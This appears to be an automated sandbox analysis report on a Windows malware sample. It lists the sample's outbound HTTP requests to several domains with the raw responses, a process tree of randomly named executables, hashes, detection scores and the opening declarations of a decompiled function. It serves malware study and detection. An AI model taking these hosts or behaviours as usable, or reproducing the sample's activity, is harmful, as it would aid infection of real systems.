65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>404 Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><br /><br /><center><a href="http://www.webuzo.com"><img src="http://www.softaculous.com/images/webuzo.gif" /></a><h1>Not Found - 404</h1><p>The requested URL was not found on this server.</p></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49705	72.1.32.168	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:55.918665886 CEST	105	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: followsuccess.net
Aug 8, 2023 16:15:56.108742952 CEST	106	IN	HTTP/1.1 200 OK Date: Tue, 08 Aug 2023 14:15:56 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 59 6f 75 27 6c 6c 20 6c 69 6b 65 20 77 68 65 72 65 20 79 6f 75 20 67 6f 20 69 66 20 79 6f 75 20 66 6f 6c 6c 6f 77 20 73 75 63 63 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 68 6f 6d 65 62 61 73 65 64 2c 20 62 75 73 69 6e 65 73 73 2c 20 4d 4c 4d 2c 20 69 6e 63 6f 6d 65 2c 20 6d 6f 6e 65 79 2c 20 49 6e 74 65 72 6e 65 74 2c 20 6f 6e 6c 69 6e 65 2c 20 6d 61 72 6b 65 74 69 6e 67 2c 20 64 69 72 65 63 74 20 73 61 6c 65 73 2c 20 77 6f 72 6b 2c 20 68 6f 6d 65 2d 62 61 73 65 64 2c 20 65 61 72 6e 2c 20 70 72 6f 66 69 74 2c 20 72 69 73 6b 2d 66 72 65 65 2c 20 73 75 63 63 65 73 73 2c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 75 63 63 65 73 73 66 75 6c 20 68 6f 6d 65 62 61 73 65 64 20 62 75 73 69 6e 65 73 73 20 77 69 74 68 20 61 20 73 75 63 63 65 73 73 66 75 6c 20 61 6e 64 20 72 65 73 70 65 63 74 65 64 20 63 6f 6d 70 61 6e 79 2e 20 20 4e 6f 20 68 79 70 65 2c 20 6e 6f 20 72 69 73 6b 2c 20 6e 6f 20 6c 61 72 67 65 20 69 6e 76 65 73 74 6d 65 6e 74 20 61 6e 64 20 77 65 20 68 61 76 65 20 74 68 65 20 70 72 6f 6f 66 20 74 68 61 74 20 69 73 20 72 65 61 6c 6c 79 20 77 6f 72 6b 73 20 66 6f 72 20 72 65 61 6c 20 70 65 6f 70 6c 65 2e 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 22 20 69 64 3d 22 64 64 5f 66 72 61 6d 65 73 65 74 5f 30 30 30 31 22 3e 0a 20 20 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 73 61 70 2e 74 69 6d 65 61 6e 64 66 72 65 65 64 6f 6d 74 65 61 6d 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 22 20 6e 61 6d 65 3d 22 64 64 5f 63 6f 6e 74 65 6e 74 5f 30 30 30 31 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 20 74 69 74 6c 65 3d 22 66 6f 6c 6c 6f 77 73 75 63 63 65 73 73 2e 6e 65 74 22 20 20 2f 3e 0a 20 20 3c 6e 6f 66 72 61 6d 65 73 3e 0a 20 20 3c 62 6f 64 79 3e 0a 53 75 63 63 65 73 73 66 75 6c 20 68 6f 6d 65 62 61 73 65 64 20 62 75 73 69 6e 65 73 73 20 77 69 74 68 20 61 20 73 75 63 63 65 73 73 66 75 6c 20 61 6e 64 20 72 65 73 70 65 63 74 65 64 20 63 6f 6d 70 61 6e 79 2e 20 20 4e 6f 20 68 79 70 65 2c 20 6e 6f 20 72 69 73 6b 2c 20 6e 6f 20 6c 61 72 67 65 20 69 6e 76 65 73 74 6d 65 6e 74 20 61 6e 64 20 77 65 20 68 61 76 65 20 74 68 65 20 70 72 6f 6f 66 20 74 68 61 74 20 69 73 20 72 65 61 6c 6c 79 20 77 6f 72 6b 73 20 66 6f 72 20 72 65 61 6c 20 70 65 6f 70 6c 65 2e 0a 3c 62 72 20 2f 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>You'll like where you go if you follow success</title><meta http-equiv="content-type" content="text/html" /><meta name="keywords" content="homebased, business, MLM, income, money, Internet, online, marketing, direct sales, work, home-based, earn, profit, risk-free, success," /><meta name="description" content="Successful homebased business with a successful and respected company. No hype, no risk, no large investment and we have the proof that is really works for real people." /></head><frameset rows="100%" id="dd_frameset_0001"> <frame src="http://asap.timeandfreedomteam.com/index.php" name="dd_content_0001" framespacing="0" frameborder="0" noresize="noresize" title="followsuccess.net" /> <noframes> <body>Successful homebased business with a successful and respected company. No hype, no risk, no large investment and we have the proof that is really works for real people.<br /> </body>
Aug 8, 2023 16:15:56.108762026 CEST	106	IN	Data Raw: 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </noframes></frameset></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49706	34.102.136.180	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:56.466319084 CEST	109	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: beginsuccess.net
Aug 8, 2023 16:15:56.873300076 CEST	109	IN	HTTP/1.0 403 Forbidden Server: openresty Date: Tue, 08 Aug 2023 14:15:56 GMT Content-Type: text/html Content-Length: 291 ETag: "64c45cd4-123" Via: 1.1 google Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49707	34.102.136.180	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:57.202012062 CEST	111	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: crowdspring.net
Aug 8, 2023 16:15:57.321975946 CEST	112	IN	HTTP/1.0 403 Forbidden Server: openresty Date: Tue, 08 Aug 2023 14:15:57 GMT Content-Type: text/html Content-Length: 291 ETag: "64c51942-123" Via: 1.1 google Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49708	34.102.136.180	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:16:02.397871017 CEST	113	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: crowdsuccess.net
Aug 8, 2023 16:16:02.521969080 CEST	114	IN	HTTP/1.0 403 Forbidden Server: openresty Date: Tue, 08 Aug 2023 14:16:02 GMT Content-Type: text/html Content-Length: 291 ETag: "64c51942-123" Via: 1.1 google Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: zGIDlWIotR.exePID: 3360, Parent PID: 3452

General

Target ID:	0
Start time:	16:15:48
Start date:	08/08/2023
Path:	C:\Users\user\Desktop\zGIDlWIotR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\zGIDlWIotR.exe
Imagebase:	0x380000
File size:	339'968 bytes
MD5 hash:	89333738292AE456B34A0027E057D8F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: aw1j2ylb8pebwqkliimle.exePID: 7936, Parent PID: 3360

General

Target ID:	1
Start time:	16:15:49
Start date:	08/08/2023
Path:	C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe
Wow64 process (32bit):	true
Commandline:	C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe
Imagebase:	0xf60000
File size:	339'968 bytes
MD5 hash:	89333738292AE456B34A0027E057D8F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: aoxsaykytfn.exePID: 8852, Parent PID: 580

General

Target ID:	2
Start time:	16:15:49
Start date:	08/08/2023
Path:	C:\helrrxxyrxmppnn\aoxsaykytfn.exe
Wow64 process (32bit):	true
Commandline:	C:\helrrxxyrxmppnn\aoxsaykytfn.exe
Imagebase:	0x11e0000
File size:	339'968 bytes
MD5 hash:	89333738292AE456B34A0027E057D8F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: lxugwbfrq.exePID: 9764, Parent PID: 8852

General

Target ID:	3
Start time:	16:15:50
Start date:	08/08/2023
Path:	C:\helrrxxyrxmppnn\lxugwbfrq.exe
Wow64 process (32bit):	true
Commandline:	h6bkcxo4qqnz "c:\helrrxxyrxmppnn\aoxsaykytfn.exe"
Imagebase:	0xaa0000
File size:	339'968 bytes
MD5 hash:	89333738292AE456B34A0027E057D8F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: aoxsaykytfn.exePID: 10704, Parent PID: 7936

General

Target ID:	4
Start time:	16:15:51
Start date:	08/08/2023
Path:	C:\helrrxxyrxmppnn\aoxsaykytfn.exe
Wow64 process (32bit):	true
Commandline:	C:\helrrxxyrxmppnn\aoxsaykytfn.exe
Imagebase:	0x11e0000
File size:	339'968 bytes
MD5 hash:	89333738292AE456B34A0027E057D8F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: zGIDlWIotR.exePID: 3360, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	60.5%
Total number of Nodes:	1203
Total number of Limit Nodes:	13

Executed Functions

Function 00381380 Relevance: 258.6, APIs: 143, Strings: 3, Instructions: 3150
libraryloadersleepCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00381380() {
				struct HINSTANCE__* _v8;
				signed int _v12;
				signed int _v20;
				long long _v28;
				signed int _v32;
				long long _v36;
				signed int _v48;
				signed int _v52;
				intOrPtr _v64;
				char _v84;
				char _v108;
				char _v132;
				char _v644;
				char _v1412;
				char _v1812;
				intOrPtr _t307;
				struct HINSTANCE__* _t312;
				signed char _t316;
				intOrPtr _t317;
				intOrPtr _t320;
				signed int _t322;
				intOrPtr _t328;
				intOrPtr _t330;
				CHAR* _t331;
				struct HINSTANCE__* _t332;
				CHAR* _t334;
				CHAR* _t337;
				CHAR* _t340;
				struct HINSTANCE__* _t342;
				CHAR* _t344;
				CHAR* _t347;
				struct HINSTANCE__* _t350;
				CHAR* _t352;
				CHAR* _t355;
				CHAR* _t359;
				intOrPtr _t361;
				CHAR* _t363;
				struct HINSTANCE__* _t365;
				CHAR* _t367;
				CHAR* _t375;
				CHAR* _t378;
				struct HINSTANCE__* _t380;
				CHAR* _t382;
				CHAR* _t385;
				CHAR* _t388;
				struct HINSTANCE__* _t390;
				CHAR* _t392;
				CHAR* _t395;
				CHAR* _t398;
				struct HINSTANCE__* _t400;
				CHAR* _t402;
				CHAR* _t405;
				CHAR* _t408;
				short _t409;
				CHAR* _t412;
				struct HINSTANCE__* _t414;
				CHAR* _t416;
				CHAR* _t421;
				struct HINSTANCE__* _t423;
				_Unknown_base(*)()* _t424;
				CHAR* _t430;
				CHAR* _t434;
				struct HINSTANCE__* _t436;
				CHAR* _t438;
				CHAR* _t441;
				CHAR* _t444;
				struct HINSTANCE__* _t447;
				CHAR* _t449;
				CHAR* _t452;
				CHAR* _t456;
				struct HINSTANCE__* _t458;
				CHAR* _t460;
				CHAR* _t463;
				signed char _t466;
				CHAR* _t467;
				CHAR* _t470;
				CHAR* _t475;
				CHAR* _t478;
				struct HINSTANCE__* _t480;
				CHAR* _t482;
				CHAR* _t485;
				CHAR* _t488;
				struct HINSTANCE__* _t490;
				CHAR* _t492;
				signed char _t500;
				CHAR* _t502;
				CHAR* _t505;
				struct HINSTANCE__* _t507;
				CHAR* _t509;
				_Unknown_base(*)()* _t511;
				CHAR* _t513;
				CHAR* _t516;
				CHAR* _t519;
				struct HINSTANCE__* _t521;
				CHAR* _t523;
				CHAR* _t526;
				struct HINSTANCE__* _t528;
				CHAR* _t530;
				CHAR* _t533;
				CHAR* _t536;
				struct HINSTANCE__* _t538;
				CHAR* _t540;
				CHAR* _t543;
				struct HINSTANCE__* _t545;
				CHAR* _t547;
				CHAR* _t549;
				struct HINSTANCE__* _t551;
				CHAR* _t553;
				CHAR* _t556;
				CHAR* _t559;
				struct HINSTANCE__* _t561;
				_Unknown_base(*)()* _t565;
				intOrPtr _t568;
				signed char _t569;
				struct HINSTANCE__* _t570;
				CHAR* _t572;
				struct HINSTANCE__* _t574;
				CHAR* _t576;
				CHAR* _t579;
				CHAR* _t584;
				_Unknown_base(*)()* _t586;
				CHAR* _t587;
				struct HINSTANCE__* _t589;
				CHAR* _t591;
				struct HINSTANCE__* _t592;
				CHAR* _t596;
				CHAR* _t599;
				struct HINSTANCE__* _t601;
				CHAR* _t603;
				CHAR* _t606;
				signed char _t610;
				struct HINSTANCE__* _t612;
				CHAR* _t613;
				struct HINSTANCE__* _t615;
				CHAR* _t618;
				struct HINSTANCE__* _t620;
				CHAR* _t622;
				signed char _t625;
				struct HINSTANCE__* _t627;
				CHAR* _t629;
				CHAR* _t632;
				signed long long _t635;
				signed char _t637;
				signed char _t639;
				struct HINSTANCE__* _t640;
				CHAR* _t642;
				CHAR* _t645;
				CHAR* _t648;
				intOrPtr _t649;
				CHAR* _t652;
				struct HINSTANCE__* _t654;
				CHAR* _t656;
				signed char _t658;
				CHAR* _t659;
				struct HINSTANCE__* _t661;
				CHAR* _t663;
				CHAR* _t666;
				CHAR* _t669;
				struct HINSTANCE__* _t671;
				CHAR* _t676;
				struct HINSTANCE__* _t678;
				CHAR* _t680;
				CHAR* _t683;
				struct HINSTANCE__* _t685;
				CHAR* _t687;
				CHAR* _t690;
				signed char _t694;
				CHAR* _t698;
				struct HINSTANCE__* _t700;
				CHAR* _t702;
				CHAR* _t707;
				void* _t710;
				void* _t711;
				signed char _t712;
				void* _t713;
				void* _t714;
				struct HINSTANCE__* _t715;
				char* _t717;
				CHAR* _t719;
				intOrPtr* _t724;
				intOrPtr* _t728;
				intOrPtr* _t729;
				void* _t733;
				intOrPtr _t736;
				signed int _t738;
				void* _t739;
				unsigned int _t740;
				void* _t743;
				unsigned int _t744;
				signed int _t745;
				signed int _t749;
				intOrPtr _t750;
				intOrPtr _t751;
				signed int _t752;
				signed int _t754;
				void* _t760;
				unsigned int _t761;
				void* _t764;
				signed char _t768;
				void* _t771;
				void* _t772;
				void* _t780;
				signed int _t788;
				int _t792;
				signed int _t797;
				void* _t800;
				struct HINSTANCE__* _t802;
				signed int _t805;
				signed int _t807;
				signed int _t809;
				signed char _t816;
				void* _t818;
				void* _t822;
				intOrPtr _t823;
				void* _t824;
				signed int _t825;
				void* _t827;
				void* _t828;
				signed int _t830;
				void* _t831;
				signed int _t837;
				intOrPtr _t839;
				signed char _t842;
				signed int _t846;
				intOrPtr _t848;
				signed int _t852;
				struct HINSTANCE__* _t853;
				CHAR* _t858;
				CHAR* _t864;
				signed int _t865;
				struct HINSTANCE__* _t871;
				void* _t880;
				short _t884;
				struct HINSTANCE__* _t889;
				intOrPtr _t894;
				CHAR* _t898;
				struct HINSTANCE__* _t901;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				CHAR* _t909;
				void* _t910;
				intOrPtr _t911;
				signed int _t912;
				intOrPtr _t914;
				struct HINSTANCE__* _t917;
				struct HINSTANCE__* _t918;
				struct HINSTANCE__* _t919;
				struct HINSTANCE__* _t924;
				struct HINSTANCE__* _t926;
				struct HINSTANCE__* _t927;
				struct HINSTANCE__* _t928;
				struct HINSTANCE__* _t929;
				signed int _t933;
				signed int _t935;
				struct HINSTANCE__* _t938;
				struct HINSTANCE__* _t939;
				struct HINSTANCE__* _t940;
				struct HINSTANCE__* _t941;
				struct HINSTANCE__* _t942;
				struct HINSTANCE__* _t943;
				struct HINSTANCE__* _t944;
				struct HINSTANCE__* _t945;
				struct HINSTANCE__* _t946;
				struct HINSTANCE__* _t947;
				struct HINSTANCE__* _t948;
				struct HINSTANCE__* _t949;
				struct HINSTANCE__* _t952;
				struct HINSTANCE__* _t953;
				struct HINSTANCE__* _t954;
				struct HINSTANCE__* _t955;
				struct HINSTANCE__* _t956;
				signed int _t958;
				signed int _t959;
				struct HINSTANCE__* _t961;
				struct HINSTANCE__* _t962;
				struct HINSTANCE__* _t963;
				struct HINSTANCE__* _t964;
				intOrPtr _t967;
				struct HINSTANCE__* _t968;
				struct HINSTANCE__* _t969;
				struct HINSTANCE__* _t970;
				struct HINSTANCE__* _t973;
				struct HINSTANCE__* _t976;
				struct HINSTANCE__* _t977;
				intOrPtr _t978;
				struct HINSTANCE__* _t980;
				struct HINSTANCE__* _t982;
				struct HINSTANCE__* _t983;
				intOrPtr _t985;
				char _t987;
				char _t988;
				signed int _t990;
				signed int _t991;
				signed int _t992;
				void* _t993;
				signed int _t996;
				int _t999;
				void* _t1001;
				signed int _t1002;
				signed int _t1004;
				int _t1007;
				intOrPtr _t1009;
				void* _t1012;
				void* _t1014;
				signed int _t1015;
				signed int _t1017;
				int _t1020;
				intOrPtr _t1023;
				void* _t1028;
				intOrPtr _t1031;
				void* _t1035;
				void _t1037;
				signed int _t1039;
				intOrPtr _t1044;
				signed int _t1045;
				signed int _t1047;
				signed int _t1051;
				intOrPtr _t1052;
				CHAR* _t1055;
				struct HINSTANCE__* _t1056;
				void* _t1057;
				void _t1059;
				signed int _t1061;
				struct HINSTANCE__* _t1067;
				intOrPtr _t1068;
				signed int _t1070;
				intOrPtr _t1073;
				struct HINSTANCE__* _t1074;
				intOrPtr _t1076;
				signed long long _t1077;
				signed int _t1079;
				intOrPtr _t1080;
				struct HINSTANCE__* _t1082;
				struct HINSTANCE__* _t1083;
				intOrPtr _t1084;
				struct HINSTANCE__* _t1085;
				struct HINSTANCE__* _t1086;
				intOrPtr _t1087;
				struct HINSTANCE__* _t1089;
				struct HINSTANCE__* _t1090;
				struct HINSTANCE__* _t1091;
				struct HINSTANCE__* _t1092;
				struct HINSTANCE__* _t1093;
				intOrPtr _t1094;
				struct HINSTANCE__* _t1095;
				struct HINSTANCE__* _t1099;
				struct HINSTANCE__* _t1100;
				struct HINSTANCE__* _t1101;
				struct HINSTANCE__* _t1102;
				struct HINSTANCE__* _t1103;
				struct HINSTANCE__* _t1104;
				struct HINSTANCE__* _t1105;
				struct HINSTANCE__* _t1106;
				struct HINSTANCE__* _t1107;
				struct HINSTANCE__* _t1108;
				struct HINSTANCE__* _t1109;
				struct HINSTANCE__* _t1110;
				struct HINSTANCE__* _t1111;
				struct HINSTANCE__* _t1112;
				struct HINSTANCE__* _t1113;
				intOrPtr _t1116;
				struct HINSTANCE__* _t1120;
				struct HINSTANCE__* _t1121;
				struct HINSTANCE__* _t1123;
				struct HINSTANCE__* _t1124;
				struct HINSTANCE__* _t1125;
				struct HINSTANCE__* _t1126;
				struct HINSTANCE__* _t1130;
				struct HINSTANCE__* _t1131;
				struct HINSTANCE__* _t1132;
				struct HINSTANCE__* _t1133;
				struct HINSTANCE__* _t1134;
				struct HINSTANCE__* _t1135;
				intOrPtr _t1136;
				struct HINSTANCE__* _t1138;
				struct HINSTANCE__* _t1139;
				struct HINSTANCE__* _t1140;
				struct HINSTANCE__* _t1141;
				struct HINSTANCE__* _t1142;
				void* _t1145;
				signed int _t1148;
				signed int _t1150;
				signed int _t1152;
				CHAR* _t1154;
				signed int _t1156;
				signed int _t1157;
				struct HINSTANCE__* _t1161;
				signed int _t1162;
				intOrPtr _t1164;
				signed short _t1166;
				intOrPtr _t1167;
				signed int _t1168;
				void* _t1169;
				void* _t1170;
				struct HINSTANCE__* _t1176;
				void _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1181;
				intOrPtr _t1182;
				signed char _t1184;
				intOrPtr _t1185;
				signed int _t1186;
				intOrPtr _t1187;
				signed int _t1189;
				struct HINSTANCE__* _t1191;
				void _t1192;
				signed int _t1193;
				struct HINSTANCE__* _t1194;
				intOrPtr _t1195;
				struct HINSTANCE__* _t1196;
				struct HINSTANCE__* _t1197;
				signed int _t1201;
				struct HINSTANCE__* _t1202;
				CHAR* _t1210;
				CHAR* _t1227;
				CHAR* _t1228;
				CHAR* _t1237;
				CHAR* _t1238;
				CHAR* _t1247;
				CHAR* _t1252;
				CHAR* _t1255;
				void* _t1259;
				void* _t1265;
				void* _t1269;
				void* _t1271;
				void* _t1275;
				char* _t1277;
				void* _t1279;
				intOrPtr _t1286;
				void* _t1287;
				intOrPtr _t1294;
				CHAR* _t1308;
				signed int _t1309;
				CHAR* _t1334;
				CHAR* _t1336;
				void* _t1350;
				void* _t1351;
				signed int _t1352;
				void* _t1353;
				void* _t1357;
				signed int _t1358;
				void* _t1361;
				void* _t1363;
				void* _t1364;
				void* _t1365;
				void* _t1378;
				void* _t1403;
				void* _t1413;
				void* _t1427;
				void* _t1434;
				void* _t1445;
				void* _t1450;
				void* _t1454;
				void* _t1455;
				void* _t1460;
				void* _t1465;
				void* _t1471;
				void* _t1476;
				void* _t1477;
				void* _t1478;
				void* _t1479;
				void* _t1480;
				void* _t1481;
				void* _t1482;
				void* _t1483;
				void* _t1485;
				void* _t1487;
				void* _t1488;
				void* _t1489;
				void* _t1490;
				void* _t1497;
				void* _t1498;
				void* _t1499;
				void* _t1500;
				void* _t1501;
				void* _t1504;
				void* _t1505;
				void* _t1506;
				void* _t1509;
				void* _t1510;
				intOrPtr _t1520;
				void* _t1550;
				void* _t1552;
				signed int _t1554;
				long long _t1563;
				signed int _t1567;
				signed long long _t1572;
				signed int _t1574;
				long long _t1576;
				signed long long _t1582;
				signed long long _t1584;
				signed int _t1594;
				signed int _t1597;
				void* _t1599;
